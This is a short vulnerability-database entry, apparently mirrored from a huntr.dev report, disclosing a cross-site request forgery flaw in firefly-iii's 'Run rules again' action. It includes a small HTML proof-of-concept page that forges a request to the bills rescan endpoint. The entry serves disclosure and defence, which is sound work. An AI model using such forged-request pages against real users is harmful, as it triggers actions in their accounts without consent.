Lucene search

K
huntrAmammad62508FDC-C26B-4312-BF75-FD3A3F997464
HistoryOct 23, 2021 - 9:27 a.m.

Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

2021-10-2309:27:00
amammad
www.huntr.dev
3

0.001 Low

EPSS

Percentile

47.9%

Description

there is a CSRF on Run rules again action

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.firefly-iii.org/bills/rescan/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

47.9%

Related for 62508FDC-C26B-4312-BF75-FD3A3F997464